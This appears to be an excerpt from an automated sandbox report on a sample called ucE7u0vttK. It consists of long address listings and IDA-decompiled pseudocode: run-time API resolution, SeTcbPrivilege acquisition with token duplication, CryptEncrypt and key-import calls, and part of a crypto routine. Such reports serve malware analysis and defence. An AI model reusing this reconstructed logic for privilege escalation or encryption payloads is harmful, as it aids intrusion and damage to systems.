    0x003a2eda
    0x003a2edc
    0x003a2edf
    0x003a2eee
    0x003a2eee
    0x003a2ee1
    0x003a2ee4
    0x003a2ee4
    0x003a2efd
    0x003a2f02
    0x003a2f05
    0x00000000
    0x003a2f05
    0x003a2e8e
    0x003a2e91
    0x003a2e94
    0x003a2ea7
    0x003a2eaa
    0x003a2eaa
    0x003a2eaa
    0x003a2ead
    0x003a2eaf
    0x003a2eb1
    0x003a2eb4
    0x003a2eb7
    0x003a2eba
    0x00000000
    0x00000000
    0x003a2ebc
    0x00000000
    0x003a2ebc
    0x003a2e96
    0x003a2e96
    0x003a2e9a
    0x003a362f
    0x003a3636
    0x00000000
    0x003a3636
    0x003a2ea0
    0x00000000
    0x003a2ea0
    0x003a2e76
    0x003a2e7a
    0x003a3624
    0x003a3624
    0x00000000
    0x003a3624
    0x00000000
    0x003a2e7a
    0x003a2e65
    0x003a2e68
    0x00000000
    0x003a2e68
    0x003a2e28
    0x003a2e2b
    0x00000000
    0x003a2e2b
    0x003a2d72
    0x003a2d77
    0x003a2d7a
    0x003a2dfb
    0x003a2e07
    0x003a2e0c
    0x003a2e0f
    0x003a2e0f
    0x00000000
    0x003a2e0f
    0x003a2d7c
    0x003a2d84
    0x003a2d8c
    0x003a2d8e
    0x003a2d9f
    0x003a2da0
    0x003a2da2
    0x003a2dc4
    0x003a2dc7
    0x003a2dca
    0x003a2ddd
    0x003a2de0
    0x003a2de0
    0x003a2de0
    0x003a2de3
    0x003a2de5
    0x003a2de7
    0x003a2dea
    0x003a2ded
    0x003a2df0
    0x00000000
    0x00000000
    0x00000000
    0x003a2df2
    0x003a2dcc
    0x003a2dcc
    0x003a2dd0
    0x003a3612
    0x003a3619
    0x00000000
    0x003a3619
    0x003a2dd6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2da4
    0x003a2da4
    0x003a2db0
    0x003a2db8
    0x003a2db9
    0x003a2dbb
    0x00000000
    0x00000000
    0x003a2dbd
    0x003a2dc0
    0x003a2dc2
    0x00000000
    0x00000000
    0x00000000
    0x003a2dc2
    0x00000000
    0x003a2da4
    0x003a2d90
    0x003a2d93
    0x003a2d95
    0x00000000
    0x00000000
    0x003a2d97
    0x003a2d99
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2bf8
    0x003a2bf8
    0x003a2bfb
    0x003a2bff
    0x003a2c01
    0x003a2c03
    0x00000000
    0x00000000
    0x003a2c09
    0x003a2c0d
    0x003a2c0f
    0x003a2c13
    0x003a2c15
    0x003a2c17
    0x003a2c19
    0x003a2c2b
    0x003a2c2b
    0x003a2c2e
    0x003a2cd0
    0x003a2cd0
    0x003a2cd7
    0x003a2cda
    0x003a2cdc
    0x003a2cde
    0x003a2ce1
    0x003a2ce1
    0x003a2ce1
    0x003a2ce5
    0x003a2ce5
    0x003a2ce8
    0x003a2ceb
    0x003a2cee
    0x003a2d20
    0x003a2d29
    0x003a2d29
    0x003a2d2b
    0x003a2d33
    0x003a2d33
    0x00000000
    0x003a2cf0
    0x003a2cf0
    0x003a2cf3
    0x003a2cf3
    0x003a2d03
    0x003a2d06
    0x003a2d09
    0x003a2d0c
    0x003a2d1a
    0x003a2d0e
    0x003a2d0e
    0x003a2d11
    0x003a2d15
    0x003a2d15
    0x003a2d1d
    0x003a2d1d
    0x003a2d1d
    0x00000000
    0x003a2cf3
    0x003a2cee
    0x003a2c3f
    0x003a2c42
    0x003a2c47
    0x00000000
    0x00000000
    0x003a2c50
    0x003a2c52
    0x003a2c52
    0x003a2c59
    0x003a2c5d
    0x003a2c5f
    0x003a2c62
    0x003a2c65
    0x003a2c65
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2c1b
    0x003a2c1b
    0x003a2c1e
    0x003a2c26
    0x003a2c28
    0x003a2c28
    0x003a2c28
    0x00000000
    0x003a2d36
    0x003a2d36
    0x003a2d39
    0x003a2d3f
    0x003a2d3f
    0x00000000
    0x003a2bf8
    0x003a2bda
    0x003a2bdd
    0x003a3604
    0x003a3607
    0x003a3607
    0x00000000
    0x003a3607
    0x00000000
    0x003a2bdd
    0x003a2b96
    0x003a2b9a
    0x003a2ba5
    0x003a2ba7
    0x003a2ba8
    0x003a2ba8
    0x00000000
    0x003a2b9a
    0x003a2a9b
    0x003a2a9b
    0x003a2aa2
    0x003a2aa4
    0x003a2adf
    0x003a2ae8
    0x003a2aec
    0x003a2aec
    0x003a2afa
    0x003a2afd
    0x003a2b01
    0x003a2b03
    0x003a2b06
    0x00000000
    0x003a2b06
    0x003a2aa6
    0x003a2aa9
    0x003a2aac
    0x003a2abf
    0x003a2ac2
    0x003a2ac2
    0x003a2ac2
    0x003a2ac5
    0x003a2ac7
    0x003a2ac9
    0x003a2acc
    0x003a2acf
    0x003a2ad2
    0x003a2ad2
    0x003a2ad9
    0x003a2adb
    0x00000000
    0x00000000
    0x003a2add
    0x00000000
    0x003a2add
    0x003a2aae
    0x003a2aae
    0x003a2ab2
    0x003a35e0
    0x003a35e7
    0x00000000
    0x003a35e7
    0x003a2ab8
    0x00000000
    0x003a2ab8
    0x003a2a30
    0x003a2a36
    0x003a2a40
    0x003a2a47
    0x003a2a55
    0x003a2a57
    0x003a2a5e
    0x003a2a67
    0x003a2a79
    0x003a2a7a
    0x003a2a7a
    0x003a2a82
    0x003a2a8a
    0x003a2a8b
    0x00000000
    0x003a2a8b
    0x003a29c2
    0x003a29c6
    0x00000000
    0x00000000
    0x003a29cc
    0x003a36da
    0x003a36df
    0x003a36e1
    0x003a36b8
    0x003a36bb
    0x003a36ca
    0x003a36cd
    0x003a36cd
    0x003a36cd
    0x003a36d0
    0x003a36d4
    0x003a36d7
    0x003a36d7
    0x00000000
    0x003a36d7
    0x003a36bd
    0x003a36bd
    0x003a36c1
    0x003a36f3
    0x003a36fa
    0x00000000
    0x003a36fa
    0x003a36c3
    0x00000000
    0x003a36c3
    0x003a36e5
    0x003a36e8
    0x003a36eb
    0x003a36ed
    0x00000000
    0x003a36ed
    0x003a295f
    0x003a2961
    0x00000000
    0x00000000
    0x003a2963
    0x003a2963
    0x003a2967
    0x00000000
    0x00000000
    0x003a2969
    0x003a296c
    0x003a296f
    0x003a355f
    0x003a3566
    0x00000000
    0x003a3566
    0x003a2975
    0x003a2975
    0x003a2978
    0x003a3571
    0x003a3575
    0x00000000
    0x00000000
    0x003a357b
    0x003a3582
    0x00000000
    0x003a3582
    0x003a2981
    0x003a2984
    0x003a2987
    0x003a2989
    0x003a298b
    0x003a298d
    0x003a298d
    0x003a298f
    0x003a2992
    0x003a299c
    0x003a2994
    0x003a2994
    0x003a2996
    0x003a2998
    0x003a2998
    0x003a2996
    0x003a29a6
    0x003a29ab
    0x003a29ae
    0x003a29b1
    0x003a29b4
    0x003a29b7
    0x00000000
    0x003a29b7
    0x003a2926
    0x003a2929
    0x00000000
    0x00000000
    0x003a292e
    0x003a2931
    0x00000000
    0x003a2931
    0x003a2902
    0x003a2906
    0x00000000
    0x003a2906
    0x003a28ef
    0x003a28ef
    0x003a28f0
    0x00000000
    0x00000000
    0x003a28f2
    0x003a28f3
    0x00000000
    0x00000000
    0x00000000
    0x003a28f9
    0x003a2835
    0x00000000
    0x00000000
    0x003a283b
    0x003a283e
    0x003a28aa
    0x003a28aa
    0x003a28ad
    0x00000000
    0x00000000
    0x003a28b3
    0x003a28b3
    0x003a28b4
    0x003a2729
    0x003a2729
    0x00000000
    0x003a2729
    0x003a28ba
    0x003a28bb
    0x00000000
    0x00000000
    0x00000000
    0x003a28bb
    0x003a2840
    0x00000000
    0x00000000
    0x003a2846
    0x003a2846
    0x003a2849
    0x003a2896
    0x003a2898
    0x00000000
    0x00000000
    0x003a289e
    0x003a28a2
    0x00000000
    0x003a28a2
    0x003a284b
    0x003a284b
    0x003a284c
    0x003a2882
    0x003a2884
    0x00000000
    0x00000000
    0x003a288a
    0x003a288e
    0x00000000
    0x003a288e
    0x003a284e
    0x003a284e
    0x003a284f
    0x003a286e
    0x003a2870
    0x00000000
    0x00000000
    0x003a2876
    0x003a287a
    0x00000000
    0x003a287a
    0x003a2851
    0x003a2854
    0x00000000
    0x00000000
    0x003a285a
    0x003a285c
    0x00000000
    0x00000000
    0x003a2862
    0x003a2866
    0x00000000
    0x003a2866
    0x003a2608
    0x00000000
    0x00000000
    0x003a260e
    0x003a2611
    0x003a2795
    0x003a2795
    0x003a2798
    0x003a2816
    0x003a2818
    0x003a281a
    0x00000000
    0x00000000
    0x003a2820
    0x003a2824
    0x00000000
    0x003a2824
    0x003a279a
    0x003a279a
    0x003a279d
    0x003a2800
    0x003a2802
    0x003a2804
    0x00000000
    0x00000000
    0x003a280a
    0x003a280e
    0x00000000
    0x003a280e
    0x003a27a0
    0x003a27a0
    0x003a27a1
    0x003a27ea
    0x003a27ec
    0x003a27ee
    0x00000000
    0x00000000
    0x003a27f4
    0x003a27f8
    0x00000000
    0x003a27f8
    0x003a27a3
    0x003a27a3
    0x003a27a4
    0x00000000
    0x00000000
    0x003a27aa
    0x003a27aa
    0x003a27ab
    0x003a27d4
    0x003a27d6
    0x003a27d8
    0x00000000
    0x00000000
    0x003a27de
    0x003a27e2
    0x00000000
    0x003a27e2
    0x003a27ad
    0x003a27ad
    0x003a27b0
    0x00000000
    0x00000000
    0x003a27b7
    0x003a27b8
    0x00000000
    0x00000000
    0x003a27be
    0x003a27c0
    0x003a27c2
    0x00000000
    0x00000000
    0x003a27c8
    0x003a27cc
    0x00000000
    0x003a27cc
    0x003a2617
    0x00000000
    0x00000000
    0x003a2620
    0x00000000
    0x00000000
    0x003a2626
    0x00000000
    0x003a262d
    0x003a2632
    0x003a2635
    0x003a2638
    0x003a263b
    0x003a263e
    0x003a2641
    0x003a2644
    0x003a2647
    0x003a264a
    0x003a2650
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2656
    0x003a2656
    0x003a265a
    0x003a2668
    0x003a266c
    0x003a267b
    0x003a267b
    0x003a267b
    0x00000000
    0x003a267b
    0x003a2671
    0x003a2674
    0x00000000
    0x003a265c
    0x003a2660
    0x003a2663
    0x003a267f
    0x003a267f
    0x003a2684
    0x00000000
    0x00000000
    0x003a2689
    0x003a268c
    0x00000000
    0x003a268c
    0x00000000
    0x003a2691
    0x003a2693
    0x003a2695
    0x003a26a3
    0x003a26a3
    0x003a26a7
    0x003a26bb
    0x003a26bb
    0x003a26bb
    0x003a26bf
    0x003a26bf
    0x003a26c2
    0x003a26ca
    0x003a26d0
    0x003a26d1
    0x003a26d5
    0x003a26e9
    0x003a26e4
    0x003a26e4
    0x003a26e4
    0x003a26f4
    0x003a2701
    0x003a2708
    0x003a2718
    0x003a2718
    0x003a2712
    0x003a2712
    0x003a2712
    0x003a2719
    0x003a2719
    0x003a2720
    0x003a2723
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2723
    0x003a26a9
    0x003a26b0
    0x00000000
    0x003a26b0
    0x003a2697
    0x003a269a
    0x003a269b
    0x003a269e
    0x00000000
    0x00000000
    0x003a2734
    0x003a2736
    0x003a2738
    0x00000000
    0x00000000
    0x003a273e
    0x003a2742
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a274a
    0x003a274c
    0x003a274e
    0x00000000
    0x00000000
    0x003a2754
    0x003a2758
    0x00000000
    0x00000000
    0x003a2760
    0x003a2762
    0x003a2764
    0x00000000
    0x00000000
    0x003a276a
    0x003a276e
    0x00000000
    0x00000000
    0x003a2776
    0x003a2778
    0x003a277a
    0x00000000
    0x00000000
    0x003a2780
    0x003a2782
    0x003a2785
    0x003a2786
    0x003a278d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2626

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039F990, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 204library
    C-Code - Quality: 53%
    			E0039F990(intOrPtr* _a4) {
				_Unknown_base(*)()* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				char _v44;
				char _v60;
				char _v160;
				intOrPtr _t53;
				intOrPtr* _t57;
				intOrPtr* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t74;
				intOrPtr* _t75;
				intOrPtr _t99;
				intOrPtr* _t104;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t128;
				signed int _t130;
				signed int _t131;
				struct HINSTANCE__* _t132;
				_Unknown_base(*)()* _t139;

				_v16 = 0;
				_v12 = 0xffffffff;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_t139 =  *0x3b85c8; // 0x73bd1f81
				if(_t139 != 0) {
					L3:
					_t53 =  *0x3b8628; // 0x593938
					_v28 = 0;
					_t20 = _t53 + 0x150; // 0x593a88
					_t130 = _t20;
					_push( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x100))))(0x28,  &_v8));
					if( *((intOrPtr*)( *_t130))() != 0) {
						_t121 =  *0x3b8628; // 0x593938
						_push( &_v40);
						_push(L"SeTcbPrivilege");
						_push(0);
						if( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x188))))() != 0) {
							_t123 =  *0x3b8628; // 0x593938
							_v44 = 1;
							_v32 = 2;
							 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x18c))))(_v8, 0,  &_v44, 0x10,  &_v60,  &_v28);
						}
					}
					_t57 =  *0x3b85dc; // 0x73bd4023
					_t131 = _t130 | 0xffffffff;
					if(_t57 == 0) {
						L17:
						_t58 =  *0x3b85fc; // 0x0
						if(_t58 == 0) {
							L22:
							_t59 = _v8;
							if(_t59 == 0) {
								L24:
								return _t59;
							}
							_t113 =  *0x3b8628; // 0x593938
							 *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x18c))))(_t59, 0,  &_v60, 0x10, 0, 0);
							_t114 =  *0x3b8628; // 0x593938
							return  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0xf8))))(_v8);
						}
						_t131 =  *_t58();
						if(_t131 == 0xffffffff) {
							goto L22;
						}
						L19:
						_t99 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t99 + 0x190))))();
						_push( &_v12);
						_push(_t131);
						if( *0x3b85c8() != 0) {
							_t68 =  *0x3b8628; // 0x593938
							_push( &_v16);
							_push(1);
							_push(1);
							_push(0);
							_push(0x2000000);
							_push(_v12);
							if( *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x144))))() != 0) {
								_t70 =  *0x3b8628; // 0x593938
								 *((intOrPtr*)( *((intOrPtr*)(_t70 + 0xf8))))(_v12);
								 *_a4 = _v16;
							}
						}
						goto L22;
					}
					_t30 =  &_v24; // 0x394354
					_push( &_v20);
					_push(1);
					_push(0);
					_push(0);
					if( *_t57() == 0) {
						goto L17;
					}
					_t32 =  &_v24; // 0x394354
					_t120 =  *_t32;
					_t128 = _v20;
					_t74 = 0;
					if(_t120 <= 0) {
						L14:
						_t75 =  *0x3b85f8; // 0x73bd1b65
						if(_t75 != 0) {
							 *_t75(_t128);
						}
						if(_t131 != 0xffffffff) {
							goto L19;
						} else {
							goto L17;
						}
					} else {
						_t104 = _t128 + 8;
						while( *_t104 != 0) {
							_t74 = _t74 + 1;
							_t104 = _t104 + 0xc;
							if(_t74 < _t120) {
								continue;
							}
							goto L14;
						}
						_t131 =  *(_t128 + (_t74 + _t74 * 2) * 4);
						goto L14;
					}
				}
				E00396CB0( &_v160, 0x97);
				_t124 =  *0x3b8628; // 0x593938
				_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x48))))( &_v160);
				_t132 = _t59;
				if(_t132 == 0) {
					goto L24;
				}
				E00396CB0( &_v160, 0x98);
				 *0x3b85dc = GetProcAddress(_t132,  &_v160);
				E00396CB0( &_v160, 0x99);
				 *0x3b85f8 = GetProcAddress(_t132,  &_v160);
				E00396CB0( &_v160, 0x9a);
				 *0x3b85fc = GetProcAddress(_t132,  &_v160);
				E00396CB0( &_v160, 0x9b);
				_t59 = GetProcAddress(_t132,  &_v160);
				 *0x3b85c8 = _t59;
				if(_t59 == 0) {
					goto L24;
				}
				goto L3;
			}



































    0x0039f99e
    0x0039f9a1
    0x0039f9a8
    0x0039f9ab
    0x0039f9ae
    0x0039f9b1
    0x0039f9b7
    0x0039fa87
    0x0039fa87
    0x0039fa90
    0x0039fa9b
    0x0039fa9b
    0x0039faa3
    0x0039faaa
    0x0039faac
    0x0039fabb
    0x0039fabc
    0x0039fac1
    0x0039fac6
    0x0039fad3
    0x0039fae0
    0x0039fae7
    0x0039faf5
    0x0039faf5
    0x0039fac6
    0x0039faf7
    0x0039fafc
    0x0039fb01
    0x0039fb49
    0x0039fb49
    0x0039fb50
    0x0039fbb4
    0x0039fbb4
    0x0039fbb9
    0x0039fbeb
    0x0039fbeb
    0x0039fbeb
    0x0039fbbb
    0x0039fbd1
    0x0039fbd6
    0x00000000
    0x0039fbe3
    0x0039fb54
    0x0039fb59
    0x00000000
    0x00000000
    0x0039fb5b
    0x0039fb5b
    0x0039fb67
    0x0039fb6c
    0x0039fb6d
    0x0039fb76
    0x0039fb7b
    0x0039fb83
    0x0039fb8a
    0x0039fb8c
    0x0039fb8e
    0x0039fb8f
    0x0039fb94
    0x0039fb99
    0x0039fb9e
    0x0039fbaa
    0x0039fbb2
    0x0039fbb2
    0x0039fb99
    0x00000000
    0x0039fb76
    0x0039fb03
    0x0039fb0a
    0x0039fb0b
    0x0039fb0d
    0x0039fb0e
    0x0039fb13
    0x00000000
    0x00000000
    0x0039fb15
    0x0039fb15
    0x0039fb18
    0x0039fb1b
    0x0039fb1f
    0x0039fb38
    0x0039fb38
    0x0039fb3f
    0x0039fb42
    0x0039fb42
    0x0039fb47
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039fb21
    0x0039fb21
    0x0039fb24
    0x0039fb28
    0x0039fb29
    0x0039fb2e
    0x00000000
    0x00000000
    0x00000000
    0x0039fb30
    0x0039fb35
    0x00000000
    0x0039fb35
    0x0039fb1f
    0x0039f9c9
    0x0039f9ce
    0x0039f9e1
    0x0039f9e3
    0x0039f9e7
    0x00000000
    0x00000000
    0x0039f9f9
    0x0039fa11
    0x0039fa22
    0x0039fa40
    0x0039fa45
    0x0039fa63
    0x0039fa68
    0x0039fa78
    0x0039fa7a
    0x0039fa81
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039FA0F
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039FA32
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039FA55
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039FA78
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A3BB7, Relevance: 10.7, APIs: 7, Instructions: 238encryption
    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
    • CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
    • CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
    • CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00392B83, Relevance: 6.0, APIs: 4, Instructions: 48
    C-Code - Quality: 92%
    			E00392B83(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr* _t26;
				void* _t29;

				_t29 = __ecx -  *0x3b8100; // 0x6c988642
				if(_t29 != 0) {
					 *0x3b8760 = __eax;
					 *0x3b875c = __ecx;
					 *0x3b8758 = __edx;
					 *0x3b8754 = __ebx;
					 *0x3b8750 = __esi;
					 *0x3b874c = __edi;
					 *0x3b8778 = ss;
					 *0x3b876c = cs;
					 *0x3b8748 = ds;
					 *0x3b8744 = es;
					 *0x3b8740 = fs;
					 *0x3b873c = gs;
					asm("pushfd");
					_pop( *0x3b8770);
					 *0x3b8764 =  *_t26;
					 *0x3b8768 = _v0;
					 *0x3b8774 =  &_a4;
					 *0x3b86b0 = 0x10001;
					_t11 =  *0x3b8768; // 0x0
					 *0x3b866c = _t11;
					 *0x3b8660 = 0xc0000409;
					 *0x3b8664 = 1;
					_t12 =  *0x3b8100; // 0x6c988642
					_v812 = _t12;
					_t13 =  *0x3b8104; // 0x936779bd
					_v808 = _t13;
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter(0x3b60b8);
					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
				} else {
					return __eax;
				}
			}












    0x00392b83
    0x00392b89
    0x0039da0f
    0x0039da14
    0x0039da1a
    0x0039da20
    0x0039da26
    0x0039da2c
    0x0039da32
    0x0039da39
    0x0039da40
    0x0039da47
    0x0039da4e
    0x0039da55
    0x0039da5c
    0x0039da5d
    0x0039da66
    0x0039da6e
    0x0039da76
    0x0039da81
    0x0039da8b
    0x0039da90
    0x0039da95
    0x0039da9f
    0x0039daa9
    0x0039daae
    0x0039dab4
    0x0039dab9
    0x0039dac1
    0x0039dacc
    0x0039dae5
    0x00392b8b
    0x00392b8b
    0x00392b8b

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0039DAC1
    • UnhandledExceptionFilter.KERNEL32(003B60B8), ref: 0039DACC
    • GetCurrentProcess.KERNEL32(C0000409), ref: 0039DAD7
    • TerminateProcess.KERNEL32(00000000), ref: 0039DADE
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AD481, Relevance: 5.2, APIs: 2, Strings: 1, Instructions: 681Crypto
    C-Code - Quality: 89%
    			E003AD481(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				char _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				char _v108;
				void* _v112;
				void* _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				char _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char** _t331;
				signed int _t333;
				signed int _t335;
				signed int _t339;
				signed int _t343;
				void* _t344;
				signed int _t346;
				signed int _t348;
				signed int _t356;
				signed int _t357;
				signed int _t366;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				void* _t373;
				void* _t378;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t393;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t404;
				signed int _t406;
				signed int _t412;
				void* _t413;
				signed int _t416;
				void* _t417;
				signed int _t421;
				signed int _t422;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int* _t430;
				signed int _t432;
				unsigned int _t434;
				unsigned int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				intOrPtr _t440;
				signed int _t442;
				intOrPtr* _t443;
				signed int _t446;
				signed int _t448;
				signed int _t449;
				intOrPtr _t454;
				signed int _t455;
				void* _t457;
				signed int _t458;
				signed int _t459;
				signed int _t465;
				signed int _t467;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				void* _t478;
				signed int _t486;
				intOrPtr* _t487;
				intOrPtr _t488;
				signed int _t492;
				signed int _t495;
				signed int* _t501;
				signed int _t503;
				intOrPtr* _t504;
				unsigned int _t512;
				signed int _t513;
				intOrPtr _t514;
				signed int _t525;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				intOrPtr _t553;
				void* _t560;
				char _t561;
				void* _t562;
				signed int _t564;
				signed int _t566;
				signed int _t569;
				signed int _t571;
				void* _t572;
				void* _t573;
				intOrPtr _t574;
				signed int _t577;
				signed int _t579;
				intOrPtr _t583;
				signed int _t589;
				signed int _t590;
				intOrPtr* _t591;
				void* _t593;
				void* _t594;
				signed int _t596;
				signed int _t599;
				signed int _t602;
				signed int _t603;
				void* _t608;
				void* _t609;

				_t478 = __ecx;
				_t331 = _a16;
				_t473 = _t331[1];
				_v112 = 0;
				_v116 = 0;
				_v68 = 0;
				_v16 = 0;
				_v36 = _t473;
				if(( *( *_t331) & 0x00000001) == 0) {
					return 0;
				}
				_t531 = _a12;
				_t333 = E003A6518(_a12);
				_v8 = _t333;
				__eflags = _t333;
				if(_t333 == 0) {
					return E003A6732(_a4, 1);
				}
				_t555 = _a20;
				E003AA694(_a20);
				_t335 = E003ADF19();
				_v12 = _t335;
				__eflags = _t335;
				if(__eflags == 0) {
					L130:
					E003AA6BB(_a20);
					return _v112;
				} else {
					_t339 = L003ADF89(_t473, _t478, 0, __eflags, _t335, _a16, _t555);
					_t609 = _t608 + 0xc;
					__eflags = _t339;
					if(_t339 == 0) {
						L128:
						E003ADF5C(_v12);
						__eflags = _v16;
						if(_v16 != 0) {
							memset(_v16, 0, _v68);
							 *0x3b8540(_v116);
						}
						goto L130;
					}
					_t343 = _v8;
					__eflags = _t343 - 0x3a9;
					if(_t343 <= 0x3a9) {
						__eflags = _t343 - 0x132;
						if(_t343 <= 0x132) {
							__eflags = _t343 - 0x59;
							if(_t343 <= 0x59) {
								__eflags = _t343 - 0x16;
								_t21 = _t343 - 0x16 > 0;
								__eflags = _t21;
								_v24 = (0 | _t21) + (0 | _t21) + 1;
							} else {
								_v24 = 4;
							}
						} else {
							_v24 = 5;
						}
					} else {
						_v24 = 6;
					}
					_t589 = 1 << _v24;
					_t344 = _t473 + _t473;
					_v20 = 1;
					__eflags = _t344 - 1;
					if(_t344 <= 1) {
						_t344 = 1;
					}
					_t590 = _t589 * _t473;
					_t346 = _t344 + _t590 << 2;
					_v68 = _t346;
					_t348 =  *0x3b8538(_t346 + 0x40);
					_v116 = _t348;
					__eflags = _t348;
					if(__eflags == 0) {
						goto L128;
					} else {
						_t560 = _t348 - (_t348 & 0x0000003f) + 0x40;
						_v16 = _t560;
						memset(_t560, 0, _v68);
						_t561 = _t560 + _t590 * 4;
						_v108 = _t561 + _t473 * 4;
						_push(2);
						_v104 = 0;
						_v84 = 0;
						_v96 = 0;
						_v76 = 0;
						_v92 = 0;
						_v72 = 0;
						_v88 = _t561;
						_t562 = _v12 + 4;
						_v100 = _t473;
						_v80 = _t473;
						_t356 = E003ADC59(_a20, _t348 & 0x0000003f, _t531, __eflags,  &_v88, "�h;", _t562, _v12);
						_t609 = _t609 + 0x1c;
						__eflags = _t356;
						if(_t356 == 0) {
							goto L128;
						}
						_t591 = _a8;
						_t474 = _a16;
						_t486 = 0;
						__eflags =  *(_t591 + 0xc);
						if( *(_t591 + 0xc) != 0) {
							L34:
							_t357 =  *(_t591 + 4);
							_v32 = _t486;
							__eflags = _t357 - _t486;
							if(_t357 <= _t486) {
								L36:
								__eflags =  *(_t591 + 0x10) & 0x00000004;
								if(( *(_t591 + 0x10) & 0x00000004) != 0) {
									L38:
									_v32 = 1;
									L39:
									__eflags =  *((intOrPtr*)(_t474 + 4)) - _t486;
